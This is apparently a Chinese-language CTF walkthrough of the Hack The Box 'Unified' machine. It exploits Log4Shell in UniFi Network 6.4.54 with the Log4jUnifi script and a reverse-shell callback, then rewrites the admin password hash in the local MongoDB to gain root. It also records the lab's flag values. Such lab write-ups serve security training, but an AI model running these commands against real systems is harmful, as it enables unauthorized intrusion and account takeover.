HTB-Unified - HackMD

* Nmap掃描 * ![](https://hackmd.io/_uploads/HkV-2bAo3.png) * 22/SSH、6789、8080、8443 * ![](https://hackmd.io/_uploads/ryPxHz0j3.png) * 察看到8443port為`UniFi Network`及網址 * 貼上網址為一`UniFi Network`登入頁面 * ![](https://hackmd.io/_uploads/Sy96Hz0o3.png) * 版本為6.4.54 * google後發現有CVE-2021-44228 * ![](https://hackmd.io/_uploads/S1IywfRoh.png) ## [Log4j漏洞](https://buzzorange.com/techorange/2021/12/21/what-is-log4j-and-log4shell/) ### [Log4jUnifi](https://github.com/puzzlepeaches/Log4jUnifi) * 安裝 * ![](https://hackmd.io/_uploads/ry1djGRoh.png) * Usage ```bash= usage: exploit.py [-h] -u URL -i CALLBACK -p PORT optional arguments: -h, --help show this help message and exit -u URL, --url URL Unifi Network Manager base URL -i CALLBACK, --ip CALLBACK Callback IP for payload delivery and reverse shell. -p PORT, --port PORT Callback port for reverse shell. ``` * 啟動Log4jUnifi * ![](https://hackmd.io/_uploads/BJYHx8Co3.png) ```bash= python3 exploit.py -u https://10.129.212.112:8443 -i 10.10.14.18 -p 7787 ``` * `nc`反連 * ![](https://hackmd.io/_uploads/SyRIxLCih.png) * user.txt * 建立交互式shell ```bash= script /dev/null -c bash ``` * ![](https://hackmd.io/_uploads/Bk3mtURs3.png) * user_flag: ||`6ced1a6a89e666c0620cdb10262ba127`|| ## Privilege Escalation * 查看`/usr/lib/unifi/data`底下的`system.properties`以及`/usr/lib/unifi/logs`都有發現一`mongodb`且運行在`27117`port * ![](https://hackmd.io/_uploads/H1RxAUAj2.png) * ![](https://hackmd.io/_uploads/B1CMAL0o3.png) * 登入mongodb列出資料表 ```bash= mongo --port 27117 show dbs ``` * ![](https://hackmd.io/_uploads/ByFAbD0s3.png) * `ace`表使用了0.002GB，來列出裡面的欄位 * ![](https://hackmd.io/_uploads/Hy3KMDAj3.png) ```bash= use ace show collections ``` * 再去列出`admin`中的資料發現第一欄為admin的name及加密過的密碼 ```bash= db.admin.find() ``` * ![](https://hackmd.io/_uploads/S1ypmvRsn.png) * 或者利用`--eval`查找admin帳號密碼等資訊，輸出格式為json ```bash= mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);" ``` :::info --eval:在terminal中執行JavaScript，不用透過mongoshell搜尋 ::: * ![](https://hackmd.io/_uploads/BydL8vRsn.png) * 現在知道admin的密碼位置以及是使用sha-512加密還有加鹽，我們利用`mkpasswd`製作一組自己的密碼等等用來複寫 * ![](https://hackmd.io/_uploads/B1QG_DRj2.png) ```bash= mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$xCWMO7iAEjAOyJb1$UZYfp4eooHvXNFDXVQtiWRu1mKU6zgFEnDY/7Ww8AWJ5cFEzwoHk10diiKG4dn29USgsgoJ.ry0RMkEOq/eac."}})' ``` * ![](https://hackmd.io/_uploads/HkPwowRih.png) * 複寫成功 * 接著就可以登入最一開始找到的登入頁面 * ![](https://hackmd.io/_uploads/B1k_0wCjn.png) * 啟用ssh並且可以更改密碼 * ssh後得到`root.txt` * ![](https://hackmd.io/_uploads/rJlZydRs3.png) * root_flag: ||`e50bc93c75b634e4b272d2f771c33681`|| ## 補充 * [Log4j漏洞成因](https://blog.csdn.net/Koikoi12/article/details/121906895) * https://buzzorange.com/techorange/2021/12/21/what-is-log4j-and-log4shell/ Log4j漏洞是基於Java的JNDI與LDAP形成的 * JNDI injection * ![](https://hackmd.io/_uploads/SydAZ3y3n.png) ### What is the Log4j? * 為基於Java開發出來的Log套件，又隸屬於Apache底下，也稱為`Apache Log4j` ### 防範方式 * 由瑞士 CERT 發表的這篇文章：Zero-Day Exploit Targeting Popular Java Library Log4j 中，有給了一張從各個環節去防禦的圖： * ![log4j_attack-720x487](https://hackmd.io/_uploads/H1ZsWPNrT.jpg)